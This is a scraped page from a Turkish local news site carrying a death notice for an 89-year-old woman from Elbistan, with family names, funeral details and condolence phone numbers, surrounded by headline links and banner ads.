</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" />
Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" />
Öğrenciler hedefi 12’den vurmak için yarıştı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" />
Piazza’da indirim yarışı</a>
</div>
</div></div> </div>
  </div>
  
</div>
          </div>
    
    <div id="mainContainer" class="container center  shadow" style="padding-top:20px;">

            <div class="page-header-fixed style hide">
        <div class="container center">
        <div class="title"></div>
        <div class="pull-right">          <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span>          <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a>
          <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
        </div>
        </div>
      </div>
      
      
      
      
<div class="reklam-fluid reklam reklam106"><a href="https://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/thumb.php?src=https://www.elbistaninsesi.com/images/banner/kucukler-ahsen-bellona_1.jpg&w=980&h=250&q=80" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" class="img-responsive"/></a></div>
<div id="ustmanset" class="fluid ustmanset  ustmanset5">
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/23-kisinin-alinacagi-gecici-ise-775-basvuru-h72913.html" title="23 kişinin alınacağı geçici işe 775 başvuru!" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/02/işkur.jpg" alt="23 kişinin alınacağı geçici işe 775 başvuru!" />
      <div class="caption">23 kişinin alınacağı geçici işe...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/9-mahalledeki-113-adet-hazine-arazisi-satilacak-h72900.html" title="9 mahalledeki 113 adet hazine arazisi satılacak" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/02/9-milyon-metrekarelik-hazine-arazisi-tarima_13107024_4657_z2.jpg" alt="9 mahalledeki 113 adet hazine arazisi satılacak" />
      <div class="caption">9 mahalledeki 113 adet hazine...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/dogalgaz-yardimi-icin-basvurular-basladi-h72896.html" title="Doğalgaz yardımı için başvurular başladı" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/02/doğalyardım.jpg" alt="Doğalgaz yardımı için başvurular başladı" />
      <div class="caption">Doğalgaz yardımı için başvurular başladı</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/2022-yili-alt-yapi-yatirimlariyla-ilgili-istisare-toplantisi-h72894.html" title="2022 yılı alt yapı yatırımlarıyla ilgili istişare toplantısı düzenlendi" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/02/alt-yapı-yatırımları-1.jpg" alt="2022 yılı alt yapı yatırımlarıyla ilgili istişare toplantısı düzenlendi" />
      <div class="caption">2022 yılı alt yapı yatırımlarıyla...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/icme-suyunda-beklenen-indirim-haberi-geldi-h72892.html" title="İçme suyunda beklenen indirim haberi geldi" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/02/İsimsiz-1.jpg" alt="İçme suyunda beklenen indirim haberi geldi" />
      <div class="caption">İçme suyunda beklenen indirim haberi...</div>    </a>
  </div>
  </div>
<!-- Üst Manşet -->

<div class="reklam-fluid reklam reklam109"><a href="https://www.elbistaninsesi.com/banner.php?id=191" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/KENTPARK-KURUYEMİŞ_1.gif" width="980" height="202" style="width:980px;height: 202px;border:0" alt="banner191" class="img-responsive"/></a></div>

      
      <!-- MAIN -->

      
      
      
      
      <div class="row">

        
        <!-- Sol Blok -->
        <div id="main" class="span8">
          <div class="reklam reklam129"><a href="https://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/balıkcı.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner162" class="img-responsive"/></a></div>
<article id="haber">

    
    
          <div class="page-header clearfix">
        <h1 class="title gs-title" itemprop="name">Fatik Arslan 89 yaşında</h1>
                <h2 class="lead" itemprop="description"><strong></strong></h2>
      </div>
    
            <div class="clearfix muted">
        <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2022-02-19 13:15:55" content="2022-02-19T13:15:55+02:00">19 Şubat 2022 Cumartesi 13:15</span></p>
              </div>
      
              <div class="clearfix newspic">
      <span>
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/fatik_arslan_89_yasinda_h72918_c6a0d.jpg" alt="Fatik Arslan 89 yaşında" itemprop="image"/>
      </span>
    </div>
    <div class="clearfix page-social">
        <div class="shr">
        <div id="paylas" class="hs-paylas paylas-haber-72918"></div>        </div>
        <div class="karakterislem secilemez pull-right">
          <i class="glyphicons-icon text_smaller"></i>
          <i class="glyphicons-icon text_bigger"></i>
          <i class="glyphicons-icon font"></i>
          <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
        </div>
    </div>
      

  <div id="newstext" class="clearfix page-content">
    
                <div class="reklam reklam134 text-center"><a href="https://www.elbistaninsesi.com/banner.php?id=167" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/hunkar.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner167" class="img-responsive"/></a></div>        <div itemprop="articleBody" id="newsbody"><p><span style="font-size:16px;"><span style="line-height:107%"><strong class="klink">Fatik Arslan 89 yaşında</strong></span></span></p>

<p><span style="font-size:16px;"><span style="line-height:107%">Aslen Ekinözü Soysallı Pörnek Mahallesinden olup Esentepe Bahçelievler mahallesinde oturan merhum Mevlüt Arslan’ın eşi, merhum Yusuf Talan ve Döndü Talan’ın kızı, pazar esnafından oğulları Feyzullah ,Kadir , Mikail, Ejder, Pakize, Firdevs, Fındık, Hasibe, Günay, Kezban kardeşlerin annesi, Recep Özcan, Mikail Kayabaşı, Cemal Yılmaz, İbrahim Ağısık ve Ergin Özcan bacanakların kayınvalidesi Fadik Arslan vefat etmiştir. Cenazesi Ekinözü Soysallı Pörnek Mahallesinde öğlen namazından sonra defnedilecektir.</span></span></p>

<p><span style="font-size:16px;"><span style="line-height:107%">Kur’an-ı Kerim Esentepe Bahçelievler Mahallesi No: 40’ da kendi hanesinde okunacaktır.</span></span></p>

<p><span style="font-size:16px;"><span style="line-height:107%">Taziye telefonu:</span></span></p>

<p><span style="font-size:16px;"><span style="line-height:107%">Feyzullah Arslan 0544 387 58 59 </span></span></p>

<p><span style="font-size:16px;"><span style="line-height:107%">Kadir Arslan 0543 489 90 43 </span></span></p><div class="p_ad"></div>

<p><span style="font-size:16px;"><span style="line-height:107%">Ejder Arsan 0 532 331 08 46</span></span></p></p></div>
                    
  
  </div>
  </article>

    <div class="hide-print">
    
<div id="anamanset" class="carousel carousel-nav hs-manset manset-standart modul-haber slid secilemez">

  <ol class="carousel-indicators twentyfive carousel-hover">

        <li class="hs-bgca active" onclick="window.location='https://www.elbistaninsesi.com/guncel/37-yasindaki-polis-memuru-gorevi-basinda-yasamini-yitirdi-h72917.html'; return false;"  data-target="#anamanset" data-slide-to="0">1</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/elbistanla-birlikte-osb-ges-yatirimlari-icin-yeni-guc-merkezi-h72914.html'; return false;"  data-target="#anamanset" data-slide-to="1">2</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/23-kisinin-alinacagi-gecici-ise-775-basvuru-h72913.html'; return false;"  data-target="#anamanset" data-slide-to="2">3</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/cocuk-oyun-parkina-kimligi-belirsiz-kisilerce-zarar-verildi-h72912.html'; return false;"  data-target="#anamanset" data-slide-to="3">4</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/baskan-cay-taraftarimiz-ile-sahada-daha-guclu-olacagiz-h72911.html'; return false;"  data-target="#anamanset" data-slide-to="4">5</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/dernek-binasina-giren-yarali-puhu-dkmp-ekiplerine-teslim-edildi-h72910.html'; return false;"  data-target="#anamanset" data-slide-to="5">6</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/baskan-arslan-ankarayi-degil-beceriksizliklerinizi-konusun-h72909.html'; return false;"  data-target="#anamanset" data-slide-to="6">7</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/kaymakamliktan-universite-adaylarina-sinav-ucreti-destegi-h72908.html'; return false;"  data-target="#anamanset" data-slide-to="7">8</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/sozcudeki-iddialara-belediyeden-yanit-h72907.html'; return false;"  data-target="#anamanset" data-slide-to="8">9</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/uyusturucu-saticisi-tutuklandi-3-h72906.html'; return false;"  data-target="#anamanset" data-slide-to="9">10</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/baskan-gul-den-baskan-tiras-a-uzatmalari-oynuyorsunuz-h72905.html'; return false;"  data-target="#anamanset" data-slide-to="10">11</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/baskan-polat-6-siyasi-partiden-once-elbistanin-sorunlarini-h72904.html'; return false;"  data-target="#anamanset" data-slide-to="11">12</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/ceyhan-nehrine-dusen-adam-yasam-mucadelesi-veriyor-h72902.html'; return false;"  data-target="#anamanset" data-slide-to="12">13</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/baskan-tiras-artik-kirli-ittifaklarinizi-gizleyemiyorsunuz-h72901.html'; return false;"  data-target="#anamanset" data-slide-to="13">14</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/9-mahalledeki-113-adet-hazine-arazisi-satilacak-h72900.html'; return false;"  data-target="#anamanset" data-slide-to="14">15</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/yollardaki-trafik-isaret-levhalari-yenileniyor-h72899.html'; return false;"  data-target="#anamanset" data-slide-to="15">16</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/mezra-ve-yayla-yollarinda-kar-mucadelesi-suruyor-h72898.html'; return false;"  data-target="#anamanset" data-slide-to="16">17</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/elbistanli-milli-sporcu-avrupa-ikincisi-oldu-h72897.html'; return false;"  data-target="#anamanset" data-slide-to="17">18</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/dogalgaz-yardimi-icin-basvurular-basladi-h72896.html'; return false;"  data-target="#anamanset" data-slide-to="18">19</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/baskan-sahin-yakit-fiyatlarina-yetisemeyen-esnafimiza-acil-h72895.html'; return false;"  data-target="#anamanset" data-slide-to="19">20</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/2022-yili-alt-yapi-yatirimlariyla-ilgili-istisare-toplantisi-h72894.html'; return false;"  data-target="#anamanset" data-slide-to="20">21</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/geri-manevra-yapan-tirin-altinda-kalan-vatandas-yaralandi-h72893.html'; return false;"  data-target="#anamanset" data-slide-to="21">22</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/icme-suyunda-beklenen-indirim-haberi-geldi-h72892.html'; return false;"  data-target="#anamanset" data-slide-to="22">23</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/kdv-indirimi-fiyatlara-yansimadi-limon-bile-istanbul-fiyatina-h72887.html'; return false;"  data-target="#anamanset" data-slide-to="23">24</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/vatandasin-gozu-kaskiden-gelecek-indirim-haberinde-h72886.html'; return false;"  data-target="#anamanset" data-slide-to="24">25</li>
    
      </ol>

  <div class="carousel-inner">

        <div class="item active">
      <a href="https://www.elbistaninsesi.com/guncel/37-yasindaki-polis-memuru-gorevi-basinda-yasamini-yitirdi-h72917.html" title="37 yaşındaki polis memuru, görevi başında yaşamını yitirdi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/37_yasindaki_polis_memuru_gorevi_basinda_yasamini_yitirdi_h72917_d7106.jpg" alt="37 yaşındaki polis memuru, görevi başında yaşamını yitirdi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">37 yaşındaki polis memuru, görevi başında yaşamını yitirdi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/elbistanla-birlikte-osb-ges-yatirimlari-icin-yeni-guc-merkezi-h72914.html" title="Elbistan’la birlikte OSB, GES yatırımları için yeni güç merkezi geliyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/elbistanla_birlikte_osb_ges_yatirimlari_icin_yeni_guc_merkezi_geliyor_h72914_8636e.jpg" alt="Elbistan’la birlikte OSB, GES yatırımları için yeni güç merkezi geliyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan’la birlikte OSB, GES yatırımları için yeni güç merkezi geliyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/23-kisinin-alinacagi-gecici-ise-775-basvuru-h72913.html" title="23 kişinin alınacağı geçici işe 775 başvuru!">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/23_kisinin_alinacagi_gecici_ise_775_basvuru_h72913_71d75.jpg" alt="23 kişinin alınacağı geçici işe 775 başvuru!" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">23 kişinin alınacağı geçici işe 775 başvuru!</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/cocuk-oyun-parkina-kimligi-belirsiz-kisilerce-zarar-verildi-h72912.html" title="Çocuk oyun parkına kimliği belirsiz kişilerce zarar verildi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/cocuk_oyun_parkina_kimligi_belirsiz_kisilerce_zarar_verildi_h72912_d70af.jpg" alt="Çocuk oyun parkına kimliği belirsiz kişilerce zarar verildi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Çocuk oyun parkına kimliği belirsiz kişilerce zarar verildi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/baskan-cay-taraftarimiz-ile-sahada-daha-guclu-olacagiz-h72911.html" title="Başkan Çay, “Taraftarımız ile sahada daha güçlü olacağız”">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/baskan_cay_taraftarimiz_ile_sahada_daha_guclu_olacagiz_h72911_72d20.jpg" alt="Başkan Çay, “Taraftarımız ile sahada daha güçlü olacağız”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Çay, “Taraftarımız ile sahada daha güçlü olacağız”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/dernek-binasina-giren-yarali-puhu-dkmp-ekiplerine-teslim-edildi-h72910.html" title="Dernek binasına giren yaralı puhu, DKMP ekiplerine teslim edildi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/dernek_binasina_giren_yarali_puhu_dkmp_ekiplerine_teslim_edildi_h72910_76f64.jpg" alt="Dernek binasına giren yaralı puhu, DKMP ekiplerine teslim edildi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Dernek binasına giren yaralı puhu, DKMP ekiplerine teslim edildi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/baskan-arslan-ankarayi-degil-beceriksizliklerinizi-konusun-h72909.html" title="Başkan Arslan: “Ankara’yı değil beceriksizliklerinizi konuşun”">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/baskan_arslan_ankarayi_degil_beceriksizliklerinizi_konusun_h72909_75497.jpg" alt="Başkan Arslan: “Ankara’yı değil beceriksizliklerinizi konuşun”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Arslan: “Ankara’yı değil beceriksizliklerinizi konuşun”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/kaymakamliktan-universite-adaylarina-sinav-ucreti-destegi-h72908.html" title="Kaymakamlıktan üniversite adaylarına sınav ücreti desteği">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/kaymakamliktan_universite_adaylarina_sinav_ucreti_destegi_h72908_c3019.jpg" alt="Kaymakamlıktan üniversite adaylarına sınav ücreti desteği" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kaymakamlıktan üniversite adaylarına sınav ücreti desteği</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/sozcudeki-iddialara-belediyeden-yanit-h72907.html" title="Sözcü’deki iddialara belediyeden yanıt">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/sozcudeki_iddialara_belediyeden_yanit_h72907_41ea5.jpg" alt="Sözcü’deki iddialara belediyeden yanıt" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Sözcü’deki iddialara belediyeden yanıt</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/uyusturucu-saticisi-tutuklandi-3-h72906.html" title="Uyuşturucu satıcısı tutuklandı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/uyusturucu_saticisi_tutuklandi_h72906_58dce.jpg" alt="Uyuşturucu satıcısı tutuklandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Uyuşturucu satıcısı tutuklandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/baskan-gul-den-baskan-tiras-a-uzatmalari-oynuyorsunuz-h72905.html" title="Başkan Gül&#039;den Başkan Tıraş&#039;a, &#039;Uzatmaları oynuyorsunuz&#039; cevabı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/baskan_gul_uzatmalari_oynuyorsunuz_h72905_88b13.jpg" alt="Başkan Gül&#039;den Başkan Tıraş&#039;a, &#039;Uzatmaları oynuyorsunuz&#039; cevabı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Gül&#039;den Başkan Tıraş&#039;a, &#039;Uzatmaları oynuyorsunuz&#039; cevabı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/baskan-polat-6-siyasi-partiden-once-elbistanin-sorunlarini-h72904.html" title="Başkan Polat: “6 siyasi partiden önce Elbistan’ın sorunlarını konuşun”">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/baskan_polat_6_siyasi_partiden_once_elbistanin_sorunlarini_konusun_h72904_3ff5a.jpg" alt="Başkan Polat: “6 siyasi partiden önce Elbistan’ın sorunlarını konuşun”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Polat: “6 siyasi partiden önce Elbistan’ın sorunlarını konuşun”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/ceyhan-nehrine-dusen-adam-yasam-mucadelesi-veriyor-h72902.html" title="Ceyhan Nehri’ne düşen adam yaşam mücadelesi veriyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/ceyhan_nehrine_dusen_adam_yasam_mucadelesi_veriyor_h72902_8b448.jpg" alt="Ceyhan Nehri’ne düşen adam yaşam mücadelesi veriyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ceyhan Nehri’ne düşen adam yaşam mücadelesi veriyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/baskan-tiras-artik-kirli-ittifaklarinizi-gizleyemiyorsunuz-h72901.html" title="Başkan Tıraş: “Artık kirli ittifaklarınızı gizleyemiyorsunuz”">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/baskan_tiras_artik_kirli_ittifaklarinizi_gizleyemiyorsunuz_h72901_32aa5.jpg" alt="Başkan Tıraş: “Artık kirli ittifaklarınızı gizleyemiyorsunuz”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Tıraş: “Artık kirli ittifaklarınızı gizleyemiyorsunuz”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/9-mahalledeki-113-adet-hazine-arazisi-satilacak-h72900.html" title="9 mahalledeki 113 adet hazine arazisi satılacak">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/9_mahalledeki_113_adet_hazine_arazisi_satilacak_h72900_7a79e.jpg" alt="9 mahalledeki 113 adet hazine arazisi satılacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">9 mahalledeki 113 adet hazine arazisi satılacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/yollardaki-trafik-isaret-levhalari-yenileniyor-h72899.html" title="Yollardaki trafik işaret levhaları yenileniyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/yollardaki_trafik_isaret_levhalari_yenileniyor_h72899_0e3b5.jpeg" alt="Yollardaki trafik işaret levhaları yenileniyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Yollardaki trafik işaret levhaları yenileniyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/mezra-ve-yayla-yollarinda-kar-mucadelesi-suruyor-h72898.html" title="Mezra ve yayla yollarında kar mücadelesi sürüyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/mezra_ve_yayla_yollarinda_kar_mucadelesi_suruyor_h72898_0de20.jpg" alt="Mezra ve yayla yollarında kar mücadelesi sürüyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Mezra ve yayla yollarında kar mücadelesi sürüyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/elbistanli-milli-sporcu-avrupa-ikincisi-oldu-h72897.html" title="Elbistanlı milli sporcu, Avrupa ikincisi oldu">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/elbistanli_milli_sporcu_avrupa_ikincisi_oldu_h72897_227e4.jpg" alt="Elbistanlı milli sporcu, Avrupa ikincisi oldu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistanlı milli sporcu, Avrupa ikincisi oldu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/dogalgaz-yardimi-icin-basvurular-basladi-h72896.html" title="Doğalgaz yardımı için başvurular başladı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/dogalgaz_yardimi_icin_basvurular_basladi_h72896_20074.jpg" alt="Doğalgaz yardımı için başvurular başladı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Doğalgaz yardımı için başvurular başladı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/baskan-sahin-yakit-fiyatlarina-yetisemeyen-esnafimiza-acil-h72895.html" title="Başkan Şahin, “Yakıt fiyatlarına yetişemeyen esnafımıza acil destek istiyoruz”">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/baskan_sahin_yakit_fiyatlarina_yetisemeyen_esnafimiza_acil_destek_istiyoruz_h72895_0ba87.jpg" alt="Başkan Şahin, “Yakıt fiyatlarına yetişemeyen esnafımıza acil destek istiyoruz”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Şahin, “Yakıt fiyatlarına yetişemeyen esnafımıza acil destek istiyoruz”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/2022-yili-alt-yapi-yatirimlariyla-ilgili-istisare-toplantisi-h72894.html" title="2022 yılı alt yapı yatırımlarıyla ilgili istişare toplantısı düzenlendi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/2022_yili_alt_yapi_yatirimlariyla_ilgili_istisare_toplantisi_duzenlendi_h72894_c9c48.JPG" alt="2022 yılı alt yapı yatırımlarıyla ilgili istişare toplantısı düzenlendi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">2022 yılı alt yapı yatırımlarıyla ilgili istişare toplantısı düzenlendi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/geri-manevra-yapan-tirin-altinda-kalan-vatandas-yaralandi-h72893.html" title="Geri manevra yapan tırın altında kalan vatandaş yaralandı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/geri_manevra_yapan_tirin_altinda_kalan_vatandas_yaralandi_h72893_543c9.jpg" alt="Geri manevra yapan tırın altında kalan vatandaş yaralandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Geri manevra yapan tırın altında kalan vatandaş yaralandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/icme-suyunda-beklenen-indirim-haberi-geldi-h72892.html" title="İçme suyunda beklenen indirim haberi geldi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/icme_suyunda_beklenen_indirim_haberi_geldi_h72892_f69f6.jpg" alt="İçme suyunda beklenen indirim haberi geldi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">İçme suyunda beklenen indirim haberi geldi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/kdv-indirimi-fiyatlara-yansimadi-limon-bile-istanbul-fiyatina-h72887.html" title="“KDV indirimi fiyatlara yansımadı, limon bile İstanbul fiyatına satılıyor”">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/kdv_indirimi_fiyatlara_yansimadi_limon_bile_istanbul_fiyatina_satiliyor_h72887_479a7.jpg" alt="“KDV indirimi fiyatlara yansımadı, limon bile İstanbul fiyatına satılıyor”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">“KDV indirimi fiyatlara yansımadı, limon bile İstanbul fiyatına satılıyor”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/vatandasin-gozu-kaskiden-gelecek-indirim-haberinde-h72886.html" title="Vatandaşın gözü KASKİ’den gelecek indirim haberinde">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/02/vatandasin_gozu_kaskiden_gelecek_indirim_haberinde_h72886_19a78.jpg" alt="Vatandaşın gözü KASKİ’den gelecek indirim haberinde" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Vatandaşın gözü KASKİ’den gelecek indirim haberinde</span>
          </h2>
          
        </div>
        
      </a>
    </div>
      </div>

